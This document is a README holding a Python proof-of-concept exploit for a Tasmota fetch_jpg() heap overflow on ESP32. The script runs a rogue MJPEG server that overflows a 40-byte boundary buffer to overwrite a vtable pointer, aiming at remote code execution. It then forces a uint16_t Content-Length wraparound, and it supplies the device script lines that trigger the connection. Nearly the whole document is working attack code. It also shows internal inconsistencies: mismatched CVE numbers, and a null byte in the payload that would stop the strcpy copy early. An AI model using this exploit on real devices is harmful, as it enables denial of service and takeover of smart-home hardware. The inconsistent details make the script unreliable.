README.md
Rendering markdown...
#!/usr/bin/env python3
"""
PoC: CVE-2026-38422
Target: Tasmota <= 15.3.0.3
File: tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino
Function: fetch_jpg()
Vulnerability:
Combined attack vector using both overflow conditions in fetch_jpg():
1. Initial connection (case 0) — boundary overflow via strcpy()
2. Frame fetch (case 2) — uint16_t wraparound via Content-Length
The combination of both in a single attack session maximizes
heap corruption and increases RCE probability on ESP32.
Buffer layout on ESP32 heap (typical):
struct JPG_TASK { Offset Size
char boundary[40]; +0x00 40
bool draw; +0x28 1
uint8_t scale; +0x29 1
uint16_t xp; +0x2A 2
uint16_t yp; +0x2C 2
WiFiClient stream; +0x2E ~80 ← vtable ptr at +0x2E
HTTPClient http; +0x7E ~200 ← vtable ptr at +0x7E
} jpg_task;
Overwriting WiFiClient vtable ptr with controlled value → RCE
when any virtual method (read, write, connect) is called.
Attack Flow:
Phase 1: Send initial response with long boundary (overflow boundary[40])
Phase 2: Send MJPEG frame with Content-Length > 65535 (uint16_t wrap)
Result: Heap corruption → potential RCE / guaranteed DoS
Author: Saidakbarxon Maxsudxonov
CVE: CVE-2026-38422
"""
import socket
import argparse
import struct
import time
from datetime import datetime
BANNER = """
╔══════════════════════════════════════════════════════╗
║ CVE-2026-38422 PoC — Tasmota fetch_jpg() ║
║ Combined Buffer Overflow → RCE / DoS ║
║ Affected: Tasmota <= 15.3.0.3 (ESP32) ║
╚══════════════════════════════════════════════════════╝
"""
def log(msg, level="*"):
ts = datetime.now().strftime("%H:%M:%S")
print(f"[{ts}] [{level}] {msg}")
# ESP32 Xtensa architecture constants
ESP32_HEAP_BASE = 0x3FFB0000 # Typical DRAM heap start
WIFI_CLIENT_VTABLE = 0x400D1234 # Placeholder — requires firmware analysis
def build_phase1_boundary(fake_vtable=None):
"""
Phase 1: Overflow boundary[40] via strcpy()
Layout: [boundary 40B][draw 1B][scale 1B][xp 2B][yp 2B][WiFiClient vtable 4B]
Total to reach vtable: 40 + 1 + 1 + 2 + 2 = 46 bytes
"""
if fake_vtable is None:
# Crash mode: fill with 0x41 to confirm overflow
payload = b"A" * 39 + b"\x00" # null-terminate at 40
payload += b"B" * 6 # overwrite draw/scale/xp/yp
payload += b"C" * 4 # corrupt WiFiClient vtable
else:
# RCE mode: overwrite vtable with controlled address
payload = b"A" * 39 + b"\x00"
payload += b"\x01" # draw = true
payload += b"\x01" # scale = 1
payload += struct.pack("<H", 0) # xp = 0
payload += struct.pack("<H", 0) # yp = 0
payload += struct.pack("<I", fake_vtable) # WiFiClient vtable
return payload
def make_initial_response(boundary_payload):
"""HTTP response for fetch_jpg case 0"""
boundary_str = boundary_payload.decode('latin-1', errors='replace')
return (
f"HTTP/1.1 200 OK\r\n"
f"Content-Type: multipart/x-mixed-replace; boundary={boundary_str}\r\n"
f"Connection: keep-alive\r\n"
f"\r\n"
).encode('latin-1', errors='replace')
def make_overflow_frame(content_length=70000):
"""
MJPEG frame with Content-Length > 65535 for uint16_t wraparound.
content_length=70000 → uint16_t = 4464 → malloc(4464)
But stream has 70000 bytes → 65536 bytes remain unread
"""
wrapped = content_length & 0xFFFF
# Send actual content_length bytes of data
jpeg_payload = (b'\xff\xd8' + # JPEG SOI
b'\xff\xe0\x00\x10' + # APP0
b'JFIF\x00\x01\x01\x00' +
b'\x00\x01\x00\x01\x00\x00' +
b'\x41' * (content_length - 20) + # padding
b'\xff\xd9') # JPEG EOI
jpeg_payload = jpeg_payload[:content_length]
frame = (
f"--BOUNDARY_OVERFLOW_PAYLOAD\r\n"
f"Content-Type: image/jpeg\r\n"
f"Content-Length: {content_length}\r\n"
f"\r\n"
).encode() + jpeg_payload
return frame, wrapped
def handle_client(conn, addr, mode, vtable):
log(f"Tasmota connected from {addr[0]}:{addr[1]}", "+")
try:
# Receive HTTP request
req = conn.recv(2048).decode('utf-8', errors='ignore')
if req:
log(f"HTTP request: {req.splitlines()[0]}")
log("=" * 52)
log("PHASE 1: Boundary strcpy() overflow (CVE-2026-38426)")
log("=" * 52)
# Build overflow payload
if mode == "rce" and vtable:
vtable_addr = int(vtable, 16)
boundary_payload = build_phase1_boundary(fake_vtable=vtable_addr)
log(f"Fake vtable address: 0x{vtable_addr:08X}", "!")
else:
boundary_payload = build_phase1_boundary()
log(f"Boundary payload: {len(boundary_payload)} bytes", "!")
log(f"Overflow: {max(0, len(boundary_payload)-39)} bytes beyond boundary[40]", "!")
# Send Phase 1
response = make_initial_response(boundary_payload)
conn.send(response)
log("Phase 1 sent — boundary[40] overflowed via strcpy()", "!")
time.sleep(1)
log("=" * 52)
log("PHASE 2: uint16_t wraparound (CVE-2026-38427)")
log("=" * 52)
content_length = 70000
frame, wrapped = make_overflow_frame(content_length)
log(f"Content-Length header: {content_length}", "!")
log(f"uint16_t(70000) = {wrapped} bytes allocated", "!")
log(f"Unread stream bytes: {content_length - wrapped}", "!")
conn.send(frame)
log("Phase 2 sent — heap/stream corruption triggered", "!")
log("Expected result: Guru Meditation Error / device reboot", "!")
time.sleep(3)
except BrokenPipeError:
log("Device disconnected — likely crashed! ✓", "+")
except Exception as e:
log(f"Error: {e}", "-")
finally:
conn.close()
log("Session complete")
def main():
print(BANNER)
parser = argparse.ArgumentParser(description="CVE-2026-38422 Combined PoC")
parser.add_argument("--ip", default="0.0.0.0")
parser.add_argument("--port", type=int, default=8887)
parser.add_argument("--mode", choices=["dos", "rce"], default="dos",
help="dos=crash only, rce=attempt vtable overwrite")
parser.add_argument("--vtable", type=str, default=None,
help="Fake vtable address for RCE (e.g. 0x3FFB1000)")
args = parser.parse_args()
log("CVE-2026-38422 — Combined Attack PoC", "+")
log(f"Mode: {args.mode.upper()}")
log(f"Listening: {args.ip}:{args.port}")
log("─" * 54)
log("Attack phases:")
log(" Phase 1: strcpy(boundary[40]) → overflow (CVE-2026-38426)")
log(" Phase 2: uint16_t Content-Length → wraparound (CVE-2026-38427)")
log("─" * 54)
log("Tasmota script to trigger:")
log(" >D")
log(" >B")
log(f" fetchjp(YOUR_IP:{args.port}/stream,0,0,1)")
log(" >1")
log(" =fetchjp(2,0,0,1)")
log("─" * 54)
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind((args.ip, args.port))
server.listen(5)
log("Waiting for Tasmota device...", "*")
try:
while True:
conn, addr = server.accept()
handle_client(conn, addr, args.mode, args.vtable)
except KeyboardInterrupt:
log("Stopped")
finally:
server.close()
if __name__ == "__main__":
main()